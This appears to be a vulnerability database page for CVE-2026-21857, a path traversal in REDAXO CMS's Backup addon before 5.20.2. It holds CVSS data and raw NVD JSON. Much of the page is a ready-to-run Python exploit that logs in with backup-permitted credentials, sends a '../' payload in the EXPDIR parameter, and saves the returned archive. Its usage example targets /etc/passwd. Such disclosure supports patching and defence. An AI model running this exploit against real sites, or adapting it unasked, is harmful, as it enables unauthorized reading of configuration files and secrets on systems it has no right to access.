Security Vulnerability Report
CVE-2026-21857 CVSS 6.5 MEDIUM

CVE-2026-21857

Published: 2026-01-07 23:15:51
Last Modified: 2026-01-20 18:49:29

Description

REDAXO is a PHP-based content management system. Prior to version 5.20.2, authenticated users with backup permissions can read arbitrary files within the webroot via path traversal in the Backup addon's file export functionality. The Backup addon does not validate the `EXPDIR` POST parameter against the UI-generated allowlist of permitted directories. An attacker can supply relative paths containing `../` sequences (or even absolute paths inside the document root) to include any readable file in the generated `.tar.gz` archive. Version 5.20.2 fixes this issue.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:redaxo:redaxo:*:*:*:*:*:*:*:* - VULNERABLE
REDAXO CMS < 5.20.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that, per the description above, exploitation requires a valid REDAXO backend account that holds backup permissions, and the advisory scopes the disclosure to files inside the webroot.
python
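import sys

import requests

# CVE-2026-21857 PoC - REDAXO Backup Path Traversal
# Target: REDAXO CMS < 5.20.2
#
# Scope caveat: the advisory describes reading files *inside the webroot*
# (relative `../` paths or absolute paths under the document root). A target
# such as /etc/passwd therefore sits outside what the bug is described to
# expose; prefer in-webroot files (e.g. configuration under the REDAXO data
# directory) when validating a target.

# Default location the received archive is written to (same name the
# original PoC used).
DEFAULT_OUTPUT = "exploit_output.tar.gz"

# Content-Type values that indicate the export endpoint returned an archive.
ARCHIVE_CONTENT_TYPES = ("application/gzip", "application/x-gzip")

# Default number of `../` components; matches the original hard-coded payload.
DEFAULT_DEPTH = 6


def build_traversal_path(file_to_read: str, depth: int = DEFAULT_DEPTH) -> str:
    """Return the EXPDIR payload: `depth` copies of `../` followed by the path.

    `depth` is how many directory levels the backup addon resolves EXPDIR
    relative to; tune it per target. A leading `/` in `file_to_read` is passed
    through unchanged because the advisory says absolute paths inside the
    document root are also accepted.

    Raises ValueError for a negative depth.
    """
    if depth < 0:
        raise ValueError("depth must be >= 0")
    return "../" * depth + file_to_read


def looks_like_archive(headers) -> bool:
    """Return True if response headers indicate a tar.gz download.

    The original PoC compared Content-Type for exact equality, which misses
    values carrying parameters (e.g. `application/gzip; charset=binary`); the
    media type is compared on its own here. `headers` is any mapping with
    `.get()` (a requests CaseInsensitiveDict or a plain dict).
    """
    raw_type = headers.get("Content-Type", "") or ""
    media_type = raw_type.split(";", 1)[0].strip().lower()
    disposition = headers.get("Content-Disposition", "") or ""
    return media_type in ARCHIVE_CONTENT_TYPES or ".tar.gz" in disposition


def login(session, target_url: str, username: str, password: str, *, timeout: float = 30) -> bool:
    """Authenticate `session` against the REDAXO backend; True on apparent success.

    Success is inferred heuristically, as in the original PoC: a response body
    that still contains "login" is treated as a failure. NOTE(review): the word
    may also appear in post-login markup; confirm against the target's actual
    response before trusting the result.
    """
    login_url = f"{target_url}/redaxo/index.php"
    login_data = {
        "form_id": "login",
        "login": username,
        "password": password,
    }
    resp = session.post(login_url, data=login_data, timeout=timeout)
    return "login" not in resp.text.lower()


def exploit(
    target_url: str,
    username: str,
    password: str,
    file_to_read: str,
    *,
    depth: int = DEFAULT_DEPTH,
    output_path: str = DEFAULT_OUTPUT,
    timeout: float = 30,
) -> bool:
    """Exploit the EXPDIR path traversal in the REDAXO Backup addon.

    Logs in, POSTs a traversal payload to the backup export page and, if the
    response looks like a tar.gz archive, writes it to `output_path`.

    Args:
        target_url: Base URL of the REDAXO install (trailing slash optional).
        username, password: Backend credentials with backup permissions.
        file_to_read: Path appended to the `../` prefix (see scope caveat above).
        depth: Number of `../` components in the payload.
        output_path: Where to store the received archive.
        timeout: Per-request timeout in seconds; the original PoC had none and
            could hang forever on an unresponsive host.

    Returns:
        True if an archive was received and saved, False otherwise.
    """
    # Avoid a doubled slash when the caller passes "http://host/".
    target_url = target_url.rstrip("/")
    session = requests.Session()

    # Step 1: Login to REDAXO
    if not login(session, target_url, username, password, timeout=timeout):
        print("[-] Login failed")
        return False
    print("[+] Login successful")

    # Step 2: Exploit path traversal via EXPDIR parameter
    backup_url = f"{target_url}/redaxo/index.php?page=backup/export"
    exploit_data = {
        "EXPDIR": build_traversal_path(file_to_read, depth),
        "send": "1",
    }
    # NOTE(review): the original PoC sends no CSRF token with this POST; if
    # the export endpoint rejects the request, check whether the target's
    # backend form requires one.
    print(f"[*] Sending exploit request for: {file_to_read}")
    resp = session.post(backup_url, data=exploit_data, timeout=timeout)

    if not looks_like_archive(resp.headers):
        print("[-] Exploit may have failed or file not found")
        return False

    print("[+] Exploit successful! File archive received.")
    with open(output_path, "wb") as f:
        f.write(resp.content)
    print(f"[+] Archive saved as {output_path}")
    return True


def main(argv: list[str]) -> int:
    """CLI entry point; returns the process exit status (0 only on success)."""
    if len(argv) < 5:
        print(f"Usage: python {argv[0]} <target_url> <username> <password> <file_path>")
        print("Example: python exploit.py http://target.com admin admin /etc/passwd")
        return 1
    target, user, pwd, file_path = argv[1], argv[2], argv[3], argv[4]
    return 0 if exploit(target, user, pwd, file_path) else 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))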

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21857", "sourceIdentifier": "[email protected]", "published": "2026-01-07T23:15:50.830", "lastModified": "2026-01-20T18:49:29.420", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "REDAXO is a PHP-based content management system. Prior to version 5.20.2, authenticated users with backup permissions can read arbitrary files within the webroot via path traversal in the Backup addon's file export functionality. The Backup addon does not validate the `EXPDIR` POST parameter against the UI-generated allowlist of permitted directories. An attacker can supply relative paths containing `../` sequences (or even absolute paths inside the document root) to include any readable file in the generated `.tar.gz` archive. Version 5.20.2 fixes this issue."}, {"lang": "es", "value": "REDAXO es un sistema de gestión de contenido basado en PHP. Antes de la versión 5.20.2, los usuarios autenticados con permisos de copia de seguridad pueden leer archivos arbitrarios dentro del directorio raíz web (webroot) mediante salto de ruta en la funcionalidad de exportación de archivos del complemento Backup. El complemento Backup no valida el parámetro POST 'EXPDIR' contra la lista blanca de directorios permitidos generada por la interfaz de usuario. Un atacante puede proporcionar rutas relativas que contengan secuencias '../' (o incluso rutas absolutas dentro del directorio raíz del documento) para incluir cualquier archivo legible en el archivo '.tar.gz' generado. 
La versión 5.20.2 corrige este problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", 
"availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-24"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redaxo:redaxo:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.20.2", "matchCriteriaId": "5BB9DA06-A124-4435-A4F0-D14EC2F291B8"}]}]}], "references": [{"url": "https://github.com/redaxo/redaxo/releases/tag/5.20.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/redaxo/redaxo/security/advisories/GHSA-824x-88xg-cwrv", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/redaxo/redaxo/security/advisories/GHSA-824x-88xg-cwrv", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}